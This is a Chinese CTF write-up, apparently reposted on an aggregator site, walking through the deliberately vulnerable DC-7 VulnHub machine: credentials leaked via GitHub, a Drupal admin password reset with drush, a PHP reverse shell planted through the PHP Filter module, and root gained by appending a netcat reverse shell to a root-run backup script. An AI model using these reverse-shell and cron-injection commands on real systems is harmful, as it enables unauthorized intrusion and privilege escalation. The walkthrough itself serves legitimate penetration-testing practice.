DC-7靶机做题记录

这篇具有很好参考价值的文章主要介绍了DC-7靶机做题记录。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

靶机下载地址:

链接:https://pan.baidu.com/s/1w2c_QKd_hOoR2AzNrdZjMg?pwd=tdky 
提取码:tdky 

参考:

  • DC7靶机地址:http://www.five86.com/downloads/DC-7.zip
  • DC7靶场介绍: https://www.vulnhub.com/entry/dc-7,356/
  • php插件地址:https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz
  • 【DC系列靶机DC7通关讲解】 https://www.bilibili.com/video/BV1f8411T7As/?share_source=copy_web&vd_source=12088c39299ad03109d9a21304b34fef
  • DC-7靶场下载及渗透实战详细过程(DC靶场系列)_域环境靶场下载-CSDN博客
  • DC-7 (1).pdf
  • ChatGPT

DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
描述:

DESCRIPTION 说明
DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
DC-7是另一个专门建造的易受攻击实验室,旨在获得渗透测试领域的经验。

While this isn't an overly technical challenge, it isn't exactly easy.
虽然这不是一个过于技术性的挑战,但也并不容易。

While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won't succeed.
虽然这是早期DC版本的一个逻辑进展(我不会告诉你是哪一个),但其中涉及一些新概念,但你需要自己弄清楚。:-)如果你需要诉诸暴力或字典攻击,你可能不会成功。

What you will need to do, is to think "outside" of the box.
你需要做的是跳出框框思考。

Waaaaaay "outside" of the box. :-)
Waaaaaay“在盒子外面”。:-)

The ultimate goal of this challenge is to get root and to read the one and only flag.
这个挑战的最终目标是扎根并阅读唯一的旗帜。

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Linux技能和熟悉Linux命令行是必须的,有一些基本渗透测试工具的经验也是必须的。

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAU7上向我推特寻求帮助,让你重新开始。但请注意:我不会给你答案,相反,我会给你一个如何前进的想法。

1、导入VMware虚拟机

下载完成后,得到DC-7.ova文件,导入到VMware后,设置靶机和kali的网络连接模式为NAT模式,靶机会自动获取ip地址。

2、拍摄快照,防止后面出问题,有快照还能恢复到初始设置
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
3、kali创建一个目录 dc7 ,后续的操作都在该目录下进行
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记

使用工具

攻击者:kali 192.168.1.128
靶机:dc-3 192.168.1.135

一.信息收集

基础信息查询

0x01 查看存活主机 0x02 查看开放端口 和 0x03 查看端口服务

这几条命令的用法可以看之前的博客,这里不再赘述
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
发现靶机192.168.1.135开放了80和22端口

判断 CMS

来到 DC7 Web ⻚⾯,可以看到 CMS 是 Drupal
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
再次信息收集
发现主⻚存在⼀些信息:
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
发现下面有一个@DC7USER
那我们就用搜索引擎去搜索一下,发现了一个Github
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
config.php配置文件中发现了账号密码
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
尝试登录web页面,发现无法登录
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
那就尝试SSH登录,登录成功

ssh dc7user@192.168.1.135

DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
发现了个root用户的定时文件backups.sh,接下来看一下文件权限
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记

ls -la /opt/scripts/

DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记

-rwxrwxr-x 1 root www-data  520 Aug 29  2019 backups.sh
root用户及其组用户(www-data)可以写入读取执行·,但其他用户没有写入的权限,只有读和执行的权限

backups.sh 内容如下 :
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
再回到/home/dc7user目录下查看一下,
发现 backups:备份⽂件
mbox:内容看着像⼀个定时备份,但是失败⽽保存的邮件
还有 .drush 这个目录
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
backups.sh 中也有 drush命令
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
发现了个drush命令,这个是drupal专属的一个操作系统命令,参考Drupal drush 常用命令

drush修改密码

使用这个命令需要先切换到drupal的目录

cd /var/www/html

查看用户信息
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
我们查看一下admin的用户信息

drush user-information admin

DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
接下来修改admin的密码

drush upwd admin --password="admin"

DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
然后我们登录后台,用admin管理员的账号
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
成功登录
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记

反弹shell

进入后台之后,我们要写木马来进行反弹shell
点击内容,并点击编辑,看看能不能把PHP代码写进去
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
并未发现支持PHP代码的
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
这个时候我们需要安装 PHP Filter 模块
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
先把它下载到本地

  • php插件地址:https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz

然后拖进去进行安装
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
还需要再勾选一遍
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
这样才算成功安装
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
此时,页面编辑器中就出现了 PHP code
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
在 Body 中添加反弹shell 的pho代码

<?php system("nc -e /bin/bash 192.168.1.128 1234");?>

点击保存
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
现在先在我们的kali里面监听1234端口

nc -lvvnp 1234

DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
然后访问一下 Welcome to DC-7这个页面,来让它解析PHP代码以触发反弹shell 的命令
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
成功反弹过来了
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记

优化 SHELL

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

权限提升

修改定时脚本⽂件提权

echo "nc -e /bin/bash 192.168.1.128 4321" >> backups.sh

DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
本地监听:

nc -lvvnp 4321

DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
等待反弹过来即可
因为这个backups.sh的脚本是以root的身份执行的,所以弹回来的shell也是root权限的shell
提权成功!
DC-7靶机做题记录,CTF,网络安全,web安全,http,网络,笔记
成功获取到flag!文章来源地址https://www.toymoban.com/news/detail-814350.html

总结

  1. 第一步非常难,就是要找到它的Github的信息泄露
  2. 对drush的了解,可能国外的人用到就比较多
  3. 要解决它支持PHP代码的问题,需要安装支持PHP的插件
  4. 对定时任务的了解,邮件的定时任务,能够去发现一些脚本的内容

完毕!

到了这里,关于DC-7靶机做题记录的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络渗透CTF实践:获取靶机Web Developer 文件/root/flag.txt中flag

    实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。 系统

    2024年01月23日
    浏览(44)
  • DC-4靶机刷题记录

    靶机下载地址: 参考: 【【基础向】超详解vulnhub靶场DC-4-爆破+反弹shell+信息收集】 https://www.bilibili.com/video/BV1Le4y1o7Sx/?share_source=copy_webvd_source=12088c39299ad03109d9a21304b34fef http://t.yssmx.com/BOGVr http://t.yssmx.com/tRrgh DC-4 (1).pdf https://c3ting.com/archives/vulnhnbshua-ti-dc-4 https://www.vulnhub.com/entr

    2024年01月20日
    浏览(35)
  • DC-3靶机刷题记录

    靶机下载地址: 参考: https://www.vulnhub.com/entry/dc-32,312/ 官网 DC-3 (1).pdf https://c3ting.com/archives/vulnhnbshua-ti—dc-3 【【基础向】超详解vulnhub靶场DC-3-一靶多打】 https://www.bilibili.com/video/BV11a411d78T/?share_source=copy_webvd_source=12088c39299ad03109d9a21304b34fef ChatGPT 当出现DE 设备 (磁盘/CD-ROM)配置不

    2024年01月20日
    浏览(41)
  • CTF网络安全大赛介绍

    CTF竞赛模式分为以下三类: 一、解题模式(Jeopardy)在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏

    2024年02月13日
    浏览(49)
  • 网络安全CTF工具合集

    各种在线工具以及工具整合 CTF资源库|CTF工具下载|CTF工具包|CTF工具集合 逆向工程: GDB – http://www.gnu.org/software/gdb/download/ IDA Pro – Download center Immunity Debugger – http://debugger.immunityinc.com/ OllyDbg – OllyDbg v1.10 radare2 – radare Hopper – Hopper - Download nm – unix/linux tool objdump – lin

    2024年02月06日
    浏览(50)
  • CTF网络安全大赛详情

    网络安全已成为现代社会的一个关键挑战,随着互联网技术的飞速发展,从个人隐私保护到国家安全,网络安全的重要性日益突显。为了应对这一挑战,CTF(Capture The Flag,中文:夺旗赛)应运而生,成为全球网络安全领域中一种非常流行的信息安全竞赛形式。 CTF赛事起源与

    2024年04月26日
    浏览(93)
  • 网络安全、夺旗赛(CTF)技能汇总_ctf夺旗赛

    本文综合博主参赛准备经历,总结介绍了过程中了解的网络安全、夺旗赛(CTF)相关知识及资源,分为资料篇、工具篇、解题思路篇。 资料篇 CTF Wiki 对CTF整体介绍,各个方向的介绍,有例题,入门必备。 CTF工具集合 集成了工具资源,方便下载。 如果你对网络安全入门感兴

    2024年02月07日
    浏览(51)
  • 网络安全CTF比赛有哪些事?——《CTF那些事儿》告诉你

    目录 前言 一、内容简介 二、读者对象  三、专家推荐  四、全书目录   CTF比赛是快速提升网络安全实战技能的重要途径,已成为各个行业选拔网络安全人才的通用方法。但是,本书作者在从事CTF培训的过程中,发现存在几个突出的问题: 1)线下CTF比赛培训中存在严重的

    2024年02月08日
    浏览(51)
  • (蓝宝书)网络安全——CTF那些事儿

    欢迎关注博主 Mindtechnist 或加入【智能科技社区】一起学习和分享Linux、C、C++、Python、Matlab,机器人运动控制、多机器人协作,智能优化算法,滤波估计、多传感器信息融合,机器学习,人工智能等相关领域的知识和技术。关注公粽号 《机器和智能》 回复 “python项目

    2024年02月08日
    浏览(93)
  • 【网络安全CTF】BUUCTF(Basic篇)

    解题思路:已给用户名密码,直接用ssh工具连接即可获取flag 查找flag在跟下 提交完成。 访问链接:为php代码审计题,看题目要求构造GET请求读取文件 http://9a7d4988-99f9-4c29-88d8-600e19887723.node4.buuoj.cn:81/?file=/…/…/flag 访问链接:为uploab-labs靶场,这个共有20关过一关可获取flag。

    2024年02月13日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包